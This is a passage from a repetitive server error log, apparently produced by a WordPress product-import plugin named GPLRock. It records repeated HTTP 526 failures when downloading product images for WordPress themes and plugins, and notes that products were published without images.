spaciaz-real-estate-construction-group-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:52:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/spaciaz--real-estate--construction-group-wordpress-theme-24757.webp for product spaciaz-real-estate-construction-group-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:52:22 UTC] GPLRock WARNING: Image download failed for product spaciaz-real-estate-construction-group-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/spaciaz--real-estate--construction-group-wordpress-theme-24757.webp [06-Apr-2026 18:52:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: spaciaz-real-estate-construction-group-wordpress-theme [06-Apr-2026 18:52:22 UTC] GPLRock: Image download failed for product emberlyn-personal-stylist-fashion-clothing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:52:24 UTC] GPLRock: Image download failed for product emberlyn-personal-stylist-fashion-clothing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:52:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/emberlyn--personal-stylist--fashion-clothing-wordpress-theme-26298.webp for product emberlyn-personal-stylist-fashion-clothing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:52:27 UTC] GPLRock: Image download failed for product emberlyn-personal-stylist-fashion-clothing-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:52:29 UTC] GPLRock: Image download failed for product emberlyn-personal-stylist-fashion-clothing-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:52:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/emberlyn--personal-stylist--fashion-clothing-wordpress-theme-26298.webp for product emberlyn-personal-stylist-fashion-clothing-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:52:31 UTC] GPLRock WARNING: Image download failed for product emberlyn-personal-stylist-fashion-clothing-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/emberlyn--personal-stylist--fashion-clothing-wordpress-theme-26298.webp [06-Apr-2026 18:52:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: emberlyn-personal-stylist-fashion-clothing-wordpress-theme [06-Apr-2026 18:52:32 UTC] GPLRock: Image download failed for product course-builder-online-course-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:52:34 UTC] GPLRock: Image download failed for product course-builder-online-course-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:52:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/course-builder---online-course-wordpress-theme-13866.webp for product course-builder-online-course-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:52:36 UTC] GPLRock: Image download failed for product course-builder-online-course-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:52:38 UTC] GPLRock: Image download failed for product course-builder-online-course-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:52:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/course-builder---online-course-wordpress-theme-13866.webp for product course-builder-online-course-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:52:40 UTC] GPLRock WARNING: Image download failed for product course-builder-online-course-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/course-builder---online-course-wordpress-theme-13866.webp [06-Apr-2026 18:52:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: course-builder-online-course-wordpress-theme [06-Apr-2026 18:52:40 UTC] GPLRock: Image download failed for product acele-responsive-app-showcase-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:52:43 UTC] GPLRock: Image download failed for product acele-responsive-app-showcase-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:52:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/acele---responsive-app-showcase-wordpress-theme-4256.webp for product acele-responsive-app-showcase-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:52:45 UTC] GPLRock: Image download failed for product acele-responsive-app-showcase-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:52:47 UTC] GPLRock: Image download failed for product acele-responsive-app-showcase-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:52:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/acele---responsive-app-showcase-wordpress-theme-4256.webp for product acele-responsive-app-showcase-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:52:49 UTC] GPLRock WARNING: Image download failed for product acele-responsive-app-showcase-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/acele---responsive-app-showcase-wordpress-theme-4256.webp [06-Apr-2026 18:52:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: acele-responsive-app-showcase-wordpress-theme [06-Apr-2026 18:52:49 UTC] GPLRock: Image download failed for product 911-police-station-fire-department-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:52:51 UTC] GPLRock: Image download failed for product 911-police-station-fire-department-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:52:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/911---police-station--fire-department-wordpress-theme-17574.webp for product 911-police-station-fire-department-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:52:53 UTC] GPLRock: Image download failed for product 911-police-station-fire-department-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:52:56 UTC] GPLRock: Image download failed for product 911-police-station-fire-department-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:52:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/911---police-station--fire-department-wordpress-theme-17574.webp for product 911-police-station-fire-department-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:52:58 UTC] GPLRock WARNING: Image download failed for product 911-police-station-fire-department-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/911---police-station--fire-department-wordpress-theme-17574.webp [06-Apr-2026 18:52:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: 911-police-station-fire-department-wordpress-theme [06-Apr-2026 18:52:58 UTC] GPLRock: Image download failed for product farvis-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:53:00 UTC] GPLRock: Image download failed for product farvis-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:53:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/farvis---multipurpose-wordpress-theme-26942.webp for product farvis-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:53:03 UTC] GPLRock: Image download failed for product farvis-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:53:05 UTC] GPLRock: Image download failed for product farvis-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:53:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/farvis---multipurpose-wordpress-theme-26942.webp for product farvis-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:53:07 UTC] GPLRock WARNING: Image download failed for product farvis-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/farvis---multipurpose-wordpress-theme-26942.webp [06-Apr-2026 18:53:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: farvis-multipurpose-wordpress-theme [06-Apr-2026 18:53:07 UTC] GPLRock: Image download failed for product sportix-wordpress-sportspress-theme-for-sport-clubs (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:53:09 UTC] GPLRock: Image download failed for product sportix-wordpress-sportspress-theme-for-sport-clubs (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:53:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sportix---wordpress-sportspress-theme-for-sport-clubs-22187.webp for product sportix-wordpress-sportspress-theme-for-sport-clubs after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:53:12 UTC] GPLRock: Image download failed for product sportix-wordpress-sportspress-theme-for-sport-clubs (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:53:14 UTC] GPLRock: Image download failed for product sportix-wordpress-sportspress-theme-for-sport-clubs (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:53:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sportix---wordpress-sportspress-theme-for-sport-clubs-22187.webp for product sportix-wordpress-sportspress-theme-for-sport-clubs after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:53:16 UTC] GPLRock WARNING: Image download failed for product sportix-wordpress-sportspress-theme-for-sport-clubs. URL: https://meldwp.com/wp-content/uploads/sportix---wordpress-sportspress-theme-for-sport-clubs-22187.webp [06-Apr-2026 18:53:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sportix-wordpress-sportspress-theme-for-sport-clubs [06-Apr-2026 18:53:16 UTC] GPLRock: Image download failed for product dannys-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:53:18 UTC] GPLRock: Image download failed for product dannys-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:53:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dannys--restaurant-wordpress-theme-23977.webp for product dannys-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:53:21 UTC] GPLRock: Image download failed for product dannys-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:53:23 UTC] GPLRock: Image download failed for product dannys-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:53:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dannys--restaurant-wordpress-theme-23977.webp for product dannys-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:53:25 UTC] GPLRock WARNING: Image download failed for product dannys-restaurant-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/dannys--restaurant-wordpress-theme-23977.webp [06-Apr-2026 18:53:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dannys-restaurant-wordpress-theme [06-Apr-2026 18:53:25 UTC] GPLRock: Image download failed for product embrad-event-conference-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:53:27 UTC] GPLRock: Image download failed for product embrad-event-conference-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:53:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/embrad---event--conference-wordpress-theme-14852.webp for product embrad-event-conference-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:53:29 UTC] GPLRock: Image download failed for product embrad-event-conference-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:53:31 UTC] GPLRock: Image download failed for product embrad-event-conference-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:53:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/embrad---event--conference-wordpress-theme-14852.webp for product embrad-event-conference-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:53:33 UTC] GPLRock WARNING: Image download failed for product embrad-event-conference-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/embrad---event--conference-wordpress-theme-14852.webp [06-Apr-2026 18:53:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: embrad-event-conference-wordpress-theme [06-Apr-2026 18:53:34 UTC] GPLRock: Image download failed for product monteno-nft-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:53:36 UTC] GPLRock: Image download failed for product monteno-nft-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:53:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/monteno---nft-portfolio-wordpress-theme-31481.webp for product monteno-nft-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:53:38 UTC] GPLRock: Image download failed for product monteno-nft-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:53:40 UTC] GPLRock: Image download failed for product monteno-nft-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:53:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/monteno---nft-portfolio-wordpress-theme-31481.webp for product monteno-nft-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:53:42 UTC] GPLRock WARNING: Image download failed for product monteno-nft-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/monteno---nft-portfolio-wordpress-theme-31481.webp [06-Apr-2026 18:53:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: monteno-nft-portfolio-wordpress-theme [06-Apr-2026 18:54:07 UTC] GPLRock: Image download failed for product wp-adsense-guard-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:54:10 UTC] GPLRock: Image download failed for product wp-adsense-guard-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:54:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-adsense-guard-plugin-11125.webp for product wp-adsense-guard-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:54:12 UTC] GPLRock: Image download failed for product wp-adsense-guard-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:54:14 UTC] GPLRock: Image download failed for product wp-adsense-guard-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:54:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wp-adsense-guard-plugin-11125.webp for product wp-adsense-guard-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:54:16 UTC] GPLRock WARNING: Image download failed for product wp-adsense-guard-plugin. URL: https://meldwp.com/wp-content/uploads/wp-adsense-guard-plugin-11125.webp [06-Apr-2026 18:54:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wp-adsense-guard-plugin [06-Apr-2026 18:54:16 UTC] GPLRock: Image download failed for product popup-notification-social-connect-prestashop-module (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:54:18 UTC] GPLRock: Image download failed for product popup-notification-social-connect-prestashop-module (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:54:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/popup-notification--social-connect---prestashop-module-7104.webp for product popup-notification-social-connect-prestashop-module after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:54:20 UTC] GPLRock: Image download failed for product popup-notification-social-connect-prestashop-module (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:54:23 UTC] GPLRock: Image download failed for product popup-notification-social-connect-prestashop-module (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:54:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/popup-notification--social-connect---prestashop-module-7104.webp for product popup-notification-social-connect-prestashop-module after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:54:25 UTC] GPLRock WARNING: Image download failed for product popup-notification-social-connect-prestashop-module. URL: https://meldwp.com/wp-content/uploads/popup-notification--social-connect---prestashop-module-7104.webp [06-Apr-2026 18:54:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: popup-notification-social-connect-prestashop-module [06-Apr-2026 18:54:25 UTC] GPLRock: Image download failed for product woocommerce-quick-view-woocommerce-wish-list-woocommerce-product-compare-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:54:27 UTC] GPLRock: Image download failed for product woocommerce-quick-view-woocommerce-wish-list-woocommerce-product-compare-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:54:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-quick-view---woocommerce-wish-list---woocommerce-product-compare-add-32031.webp for product woocommerce-quick-view-woocommerce-wish-list-woocommerce-product-compare-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:54:29 UTC] GPLRock: Image download failed for product woocommerce-quick-view-woocommerce-wish-list-woocommerce-product-compare-addon-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:54:31 UTC] GPLRock: Image download failed for product woocommerce-quick-view-woocommerce-wish-list-woocommerce-product-compare-addon-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:54:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-quick-view---woocommerce-wish-list---woocommerce-product-compare-add-32031.webp for product woocommerce-quick-view-woocommerce-wish-list-woocommerce-product-compare-addon-for-elementor after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:54:33 UTC] GPLRock WARNING: Image download failed for product woocommerce-quick-view-woocommerce-wish-list-woocommerce-product-compare-addon-for-elementor. URL: https://meldwp.com/wp-content/uploads/woocommerce-quick-view---woocommerce-wish-list---woocommerce-product-compare-add-32031.webp [06-Apr-2026 18:54:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-quick-view-woocommerce-wish-list-woocommerce-product-compare-addon-for-elementor [06-Apr-2026 18:54:34 UTC] GPLRock: Image download failed for product aliomatic-aliexpress-affiliate-money-generator-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:54:36 UTC] GPLRock: Image download failed for product aliomatic-aliexpress-affiliate-money-generator-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:54:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aliomatic---aliexpress-affiliate-money-generator-plugin-for-wordpress-21747.webp for product aliomatic-aliexpress-affiliate-money-generator-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:54:38 UTC] GPLRock: Image download failed for product aliomatic-aliexpress-affiliate-money-generator-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:54:40 UTC] GPLRock: Image download failed for product aliomatic-aliexpress-affiliate-money-generator-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:54:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aliomatic---aliexpress-affiliate-money-generator-plugin-for-wordpress-21747.webp for product aliomatic-aliexpress-affiliate-money-generator-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:54:42 UTC] GPLRock WARNING: Image download failed for product aliomatic-aliexpress-affiliate-money-generator-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/aliomatic---aliexpress-affiliate-money-generator-plugin-for-wordpress-21747.webp [06-Apr-2026 18:54:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: aliomatic-aliexpress-affiliate-money-generator-plugin-for-wordpress [06-Apr-2026 18:54:42 UTC] GPLRock: Image download failed for product binance-pay-payment-gateway-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:54:44 UTC] GPLRock: Image download failed for product binance-pay-payment-gateway-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:54:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/binance-pay-payment-gateway-for-woocommerce-2018.webp for product binance-pay-payment-gateway-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:54:47 UTC] GPLRock: Image download failed for product binance-pay-payment-gateway-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:54:49 UTC] GPLRock: Image download failed for product binance-pay-payment-gateway-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:54:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/binance-pay-payment-gateway-for-woocommerce-2018.webp for product binance-pay-payment-gateway-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:54:51 UTC] GPLRock WARNING: Image download failed for product binance-pay-payment-gateway-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/binance-pay-payment-gateway-for-woocommerce-2018.webp [06-Apr-2026 18:54:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: binance-pay-payment-gateway-for-woocommerce [06-Apr-2026 18:54:51 UTC] GPLRock: Image download failed for product stripe-payment-details-and-analysis-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:54:53 UTC] GPLRock: Image download failed for product stripe-payment-details-and-analysis-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:54:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/stripe-payment-details-and-analysis-for-woocommerce-32465.webp for product stripe-payment-details-and-analysis-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:54:55 UTC] GPLRock: Image download failed for product stripe-payment-details-and-analysis-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:54:57 UTC] GPLRock: Image download failed for product stripe-payment-details-and-analysis-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:55:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/stripe-payment-details-and-analysis-for-woocommerce-32465.webp for product stripe-payment-details-and-analysis-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:55:00 UTC] GPLRock WARNING: Image download failed for product stripe-payment-details-and-analysis-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/stripe-payment-details-and-analysis-for-woocommerce-32465.webp [06-Apr-2026 18:55:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: stripe-payment-details-and-analysis-for-woocommerce [06-Apr-2026 18:55:00 UTC] GPLRock: Image download failed for product wordpress-whatsapp-chat-button (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:55:02 UTC] GPLRock: Image download failed for product wordpress-whatsapp-chat-button (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:55:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-whatsapp-chat-button-11993.webp for product wordpress-whatsapp-chat-button after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:55:04 UTC] GPLRock: Image download failed for product wordpress-whatsapp-chat-button (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:55:06 UTC] GPLRock: Image download failed for product wordpress-whatsapp-chat-button (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:55:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-whatsapp-chat-button-11993.webp for product wordpress-whatsapp-chat-button after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:55:08 UTC] GPLRock WARNING: Image download failed for product wordpress-whatsapp-chat-button. URL: https://meldwp.com/wp-content/uploads/wordpress-whatsapp-chat-button-11993.webp [06-Apr-2026 18:55:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-whatsapp-chat-button [06-Apr-2026 18:55:08 UTC] GPLRock: Image download failed for product advanced-floating-sliding-panel (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:55:10 UTC] GPLRock: Image download failed for product advanced-floating-sliding-panel (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:55:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/advanced-floating-sliding-panel-29126.webp for product advanced-floating-sliding-panel after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:55:13 UTC] GPLRock: Image download failed for product advanced-floating-sliding-panel (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:55:15 UTC] GPLRock: Image download failed for product advanced-floating-sliding-panel (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:55:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/advanced-floating-sliding-panel-29126.webp for product advanced-floating-sliding-panel after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:55:17 UTC] GPLRock WARNING: Image download failed for product advanced-floating-sliding-panel. URL: https://meldwp.com/wp-content/uploads/advanced-floating-sliding-panel-29126.webp [06-Apr-2026 18:55:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: advanced-floating-sliding-panel [06-Apr-2026 18:55:17 UTC] GPLRock: Image download failed for product ultimate-woocommerce-brands-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:55:19 UTC] GPLRock: Image download failed for product ultimate-woocommerce-brands-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:55:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ultimate-woocommerce-brands-plugin-7096.webp for product ultimate-woocommerce-brands-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:55:21 UTC] GPLRock: Image download failed for product ultimate-woocommerce-brands-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:55:24 UTC] GPLRock: Image download failed for product ultimate-woocommerce-brands-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:55:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ultimate-woocommerce-brands-plugin-7096.webp for product ultimate-woocommerce-brands-plugin after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:55:26 UTC] GPLRock WARNING: Image download failed for product ultimate-woocommerce-brands-plugin. URL: https://meldwp.com/wp-content/uploads/ultimate-woocommerce-brands-plugin-7096.webp [06-Apr-2026 18:55:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ultimate-woocommerce-brands-plugin [06-Apr-2026 18:55:26 UTC] GPLRock: Image download failed for product distance-radius-add-on-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:55:28 UTC] GPLRock: Image download failed for product distance-radius-add-on-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:55:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/distance-radius-add-on-for-wordpress-27030.webp for product distance-radius-add-on-for-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:55:30 UTC] GPLRock: Image download failed for product distance-radius-add-on-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:55:32 UTC] GPLRock: Image download failed for product distance-radius-add-on-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:55:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/distance-radius-add-on-for-wordpress-27030.webp for product distance-radius-add-on-for-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:55:34 UTC] GPLRock WARNING: Image download failed for product distance-radius-add-on-for-wordpress. URL: https://meldwp.com/wp-content/uploads/distance-radius-add-on-for-wordpress-27030.webp [06-Apr-2026 18:55:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: distance-radius-add-on-for-wordpress [06-Apr-2026 20:55:52 UTC] GPLRock: Image download failed for product kidz-kids-store-and-baby-shop-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:55:54 UTC] GPLRock: Image download failed for product kidz-kids-store-and-baby-shop-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:55:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kidz---kids-store-and-baby-shop-theme-2306.webp for product kidz-kids-store-and-baby-shop-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 20:55:56 UTC] GPLRock: Image download failed for product kidz-kids-store-and-baby-shop-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:55:59 UTC] GPLRock: Image download failed for product kidz-kids-store-and-baby-shop-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 20:56:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kidz---kids-store-and-baby-shop-theme-2306.webp for product kidz-kids-store-and-baby-shop-theme after 